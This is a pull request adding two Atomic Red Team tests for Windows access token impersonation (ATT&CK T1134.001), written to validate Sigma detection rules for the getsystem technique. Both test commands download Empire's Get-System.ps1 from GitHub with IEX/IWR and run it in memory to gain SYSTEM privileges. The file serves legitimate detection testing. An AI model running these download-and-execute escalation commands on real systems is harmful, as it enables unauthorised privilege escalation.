### PR TITLE
Add tests for T1134.001 Access Token Impersonation/Theft

### DIFF
--- a/atomics/T1134.001/T1134.001.yaml
+++ b/atomics/T1134.001/T1134.001.yaml
@@ -1,0 +1,25 @@
+attack_technique: T1134.001
+display_name: 'Access Token Manipulation: Token Impersonation/Theft'
+atomic_tests:
+- name: Named pipe client impersonation
+  description: |-
+    Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context.
+    When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
+
+    Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
+  supported_platforms:
+  - windows
+  executor:
+    command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'); Get-System -Technique NamedPipe -Verbose
+    name: powershell
+    elevation_required: true
+- name: '`SeDebugPrivilege` token duplication'
+  description: |-
+    Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process.
+    When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
+  supported_platforms:
+  - windows
+  executor:
+    command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'); Get-System -Technique Token -Verbose
+    name: powershell
+    elevation_required: true


### PR DESCRIPTION
**Details:**
These tests have been written as part of the OSCD Initiative sprint (#1220).
The inital goal was to have a test for these two sigma rules (task 8 in the sprint backlog):
- [win_meterpreter_or_cobaltstrike_getsystem_service_start.yml](https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml)
- [win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml](https://github.com/Neo23x0/sigma/blob/master/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml)

These rules are covered by the first atomic test (named pipe client impersonation).

However, the PowerShell module that I used for the test also offers an other technique (token duplication via `SeDebugPrivilege`) which is also relevant for this ATT&CK technique, so I added a second test.

**Testing:**
Manually tested on Windows 10 by running the tests then inspecting the event logs.